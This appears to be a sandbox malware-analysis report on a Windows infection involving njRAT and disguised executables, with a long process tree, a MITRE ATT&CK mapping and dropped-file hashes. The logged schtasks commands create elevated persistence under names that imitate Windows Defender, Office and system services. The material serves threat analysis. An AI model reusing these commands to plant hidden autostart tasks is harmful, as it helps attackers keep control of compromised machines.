        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XYc5oiFAG9nt.bat" "
        38⤵
        
        PID:5988
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        39⤵
        
        PID:7588
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        39⤵
        Runs ping.exe
        
        PID:7480
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        39⤵
        
        PID:7748
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        40⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\irmUQShVUt6d.bat" "
        40⤵
        
        PID:7632
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        41⤵
        
        PID:8156
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        41⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5116
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        41⤵
        
        PID:1876
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        42⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7364
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6twjwZfvXxsE.bat" "
        42⤵
        
        PID:7112
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        43⤵
        
        PID:7848
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        43⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4368
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        43⤵
        
        PID:6808
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        44⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6272
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GXHTA1z4K12J.bat" "
        44⤵
        
        PID:6660
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        45⤵
        
        PID:2140
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        45⤵
        
        PID:7432
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        45⤵
        
        PID:7868
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        45⤵
        
        PID:8156
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        46⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1308
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\l2XwRp373WEh.bat" "
        46⤵
        
        PID:8148
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        47⤵
        
        PID:7164
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        47⤵
        
        PID:7872
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        47⤵
        Runs ping.exe
        
        PID:7800
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        47⤵
        
        PID:3436
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        48⤵
        
        PID:7528
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VOrROat11D3G.bat" "
        48⤵
        
        PID:8108
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        49⤵
        
        PID:6576
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        49⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7496
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        49⤵
        
        PID:3768
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        50⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8036
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xSjTf7LgwfUh.bat" "
        50⤵
        
        PID:7628
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        51⤵
        
        PID:6404
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        51⤵
        
        PID:7920
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        51⤵
        
        PID:7556
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        52⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5276
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pq541OEFVc32.bat" "
        52⤵
        
        PID:7328
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        53⤵
        
        PID:7640
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        53⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6140
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        53⤵
        
        PID:5616
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        54⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7012
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ckqE0QRU796R.bat" "
        54⤵
        
        PID:7668
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        55⤵
        
        PID:6228
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        55⤵
        
        PID:2176
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        55⤵
        
        PID:5276
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        56⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3076
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hz6fy662sW0V.bat" "
        56⤵
        
        PID:7908
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        57⤵
        
        PID:3156
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        57⤵
        
        PID:1400
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        57⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:8108
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        57⤵
        
        PID:1176
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        58⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7584
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        59⤵
        
        PID:3000
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c18kyh3fm1Cp.bat" "
        58⤵
        
        PID:6800
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        59⤵
        
        PID:5384
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        59⤵
        Runs ping.exe
        
        PID:6528
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        59⤵
        
        PID:5268
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        60⤵
        
        PID:7696
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lsLtper4hQMG.bat" "
        60⤵
        
        PID:6472
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        61⤵
        
        PID:2104
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        61⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6408
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        61⤵
        
        PID:4968
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        62⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2208
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        63⤵
        
        PID:7588
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8uog8lRC7OGw.bat" "
        62⤵
        
        PID:7916
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        63⤵
        
        PID:7580
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        63⤵
        Runs ping.exe
        
        PID:3976
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        63⤵
        
        PID:7928
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        64⤵
        
        PID:7408
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mD2orQvMUdRc.bat" "
        64⤵
        
        PID:6684
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        65⤵
        
        PID:4996
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        65⤵
        
        PID:2512
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        65⤵
        
        PID:7560
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        66⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:404
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oJzlteSrYZ9i.bat" "
        66⤵
        
        PID:6180
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        67⤵
        
        PID:7452
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        67⤵
        
        PID:5180
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        67⤵
        
        PID:7064
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        67⤵
        
        PID:8088
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        68⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3600
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yac6GDeQJ4x2.bat" "
        68⤵
        
        PID:7856
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        69⤵
        
        PID:8076
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        69⤵
        
        PID:8176
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        69⤵
        
        PID:5532
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        70⤵
        
        PID:3120
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3fddEV4PG8tu.bat" "
        70⤵
        
        PID:2576
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        71⤵
        
        PID:7164
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        71⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:7904
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        71⤵
        
        PID:7644
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        72⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4972
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\G1f9mjPXjgL4.bat" "
        72⤵
        
        PID:5976
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        73⤵
        
        PID:6748
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        73⤵
        
        PID:3836
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        73⤵
        
        PID:2176
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        74⤵
        
        PID:6400
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6BhTxvoQ6k7n.bat" "
        74⤵
        
        PID:7416
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        75⤵
        
        PID:6180
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        75⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7840
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        75⤵
        
        PID:3624
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        76⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6876
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1K2t3zeLg3ai.bat" "
        76⤵
        
        PID:5028
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        77⤵
        
        PID:8028
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        77⤵
        
        PID:7068
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        77⤵
        
        PID:6748
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        77⤵
        
        PID:4080
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        78⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6160
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\37BAkRR4WH6v.bat" "
        78⤵
        
        PID:8128
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        79⤵
        
        PID:6712
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        79⤵
        Runs ping.exe
        
        PID:5624
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        79⤵
        
        PID:4648
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        80⤵
        
        PID:7388
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jreMBAlMMwR4.bat" "
        80⤵
        
        PID:6888
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        81⤵
        
        PID:7904
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        81⤵
        Runs ping.exe
        
        PID:7652
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        81⤵
        
        PID:7236
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        82⤵
        
        PID:7944
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\G1awI9Cgj7AS.bat" "
        82⤵
        
        PID:3288
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        83⤵
        
        PID:7980
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        83⤵
        
        PID:7760
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        83⤵
        
        PID:8100
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        84⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7132
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bxEdJJazRMUl.bat" "
        84⤵
        
        PID:5900
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        85⤵
        
        PID:6116

C:\Users\Admin\AppData\Roaming\NJRAT%20DANGEROUS.exe
C:\Users\Admin\AppData\Roaming\NJRAT%20DANGEROUS.exe
1⤵
- Executes dropped EXE
PID:4880

C:\Users\Admin\AppData\Roaming\NJRAT%20DANGEROUS.exe
C:\Users\Admin\AppData\Roaming\NJRAT%20DANGEROUS.exe
1⤵
PID:5480

C:\Users\Admin\AppData\Roaming\NJRAT%20DANGEROUS.exe
C:\Users\Admin\AppData\Roaming\NJRAT%20DANGEROUS.exe
1⤵
PID:6216

C:\ProgramData\Java Update(32bit).exe
"C:\ProgramData\Java Update(32bit).exe"
1⤵
PID:6328

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "shosts" /sc MINUTE /mo 10 /tr "'C:\BlockcomrefDhcp\shost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6612

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "shost" /sc ONLOGON /tr "'C:\BlockcomrefDhcp\shost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6752

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "shosts" /sc MINUTE /mo 10 /tr "'C:\BlockcomrefDhcp\shost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2204

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Default User\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:3156

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\BlockcomrefDhcp\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3504

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\BlockcomrefDhcp\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:6320

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\BlockcomrefDhcp\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:6388

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\OfficeClickToRun.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:244

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6240

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6696

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6848

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5500

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:5384

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1872

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6744

C:\Users\Admin\svchost.exe
C:\Users\Admin\svchost.exe
1⤵
PID:7856

C:\Users\Admin\AppData\Roaming\NJRAT%20DANGEROUS.exe
C:\Users\Admin\AppData\Roaming\NJRAT%20DANGEROUS.exe
1⤵
PID:7556

C:\ProgramData\Java Update(32bit).exe
"C:\ProgramData\Java Update(32bit).exe"
1⤵
PID:8072

C:\Users\Admin\svchost.exe
C:\Users\Admin\svchost.exe
1⤵
PID:8060

C:\Users\Admin\AppData\Roaming\NJRAT%20DANGEROUS.exe
C:\Users\Admin\AppData\Roaming\NJRAT%20DANGEROUS.exe
1⤵
PID:7040

C:\ProgramData\Java Update(32bit).exe
"C:\ProgramData\Java Update(32bit).exe"
1⤵
PID:5840

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:7596

C:\Users\Admin\svchost.exe
C:\Users\Admin\svchost.exe
1⤵
PID:7992

C:\Users\Admin\AppData\Roaming\NJRAT%20DANGEROUS.exe
C:\Users\Admin\AppData\Roaming\NJRAT%20DANGEROUS.exe
1⤵
PID:7720

C:\ProgramData\Java Update(32bit).exe
"C:\ProgramData\Java Update(32bit).exe"
1⤵
PID:7664

C:\Users\Admin\svchost.exe
C:\Users\Admin\svchost.exe
1⤵
PID:4484

C:\Users\Admin\AppData\Roaming\NJRAT%20DANGEROUS.exe
C:\Users\Admin\AppData\Roaming\NJRAT%20DANGEROUS.exe
1⤵
PID:6096

C:\ProgramData\Java Update(32bit).exe
"C:\ProgramData\Java Update(32bit).exe"
1⤵
PID:6168

C:\Users\Admin\svchost.exe
C:\Users\Admin\svchost.exe
1⤵
PID:7060

C:\Users\Admin\AppData\Roaming\NJRAT%20DANGEROUS.exe
C:\Users\Admin\AppData\Roaming\NJRAT%20DANGEROUS.exe
1⤵
PID:5324

C:\ProgramData\Java Update(32bit).exe
"C:\ProgramData\Java Update(32bit).exe"
1⤵
PID:7952

C:\Users\Admin\svchost.exe
C:\Users\Admin\svchost.exe
1⤵
PID:7148

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
b5ad5caaaee00cb8cf445427975ae66c

SHA1
dcde6527290a326e048f9c3a85280d3fa71e1e22

SHA256
b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8

SHA512
92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
